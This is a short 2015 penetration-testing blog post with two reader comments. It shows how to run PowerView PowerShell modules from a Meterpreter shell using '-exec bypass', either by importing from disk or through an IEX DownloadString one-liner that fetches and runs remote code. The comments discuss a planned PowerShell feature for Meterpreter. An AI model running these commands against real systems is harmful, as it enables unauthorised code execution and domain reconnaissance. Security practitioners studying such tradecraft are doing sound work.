Monday, February 23, 2015

Running PowerShell Scripts That Require Module Imports With Meterpreter

Old post on the subject here:

More recent posts on the subject by harmj0y

Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk

Gist with the command

meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"

Via IEX download method: Gist with the command

C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Get-NetDomain"



OJ said...

Executing Powershell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell" which is called "powershell" that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.

So watch this space!

CG said...

yes plz :-)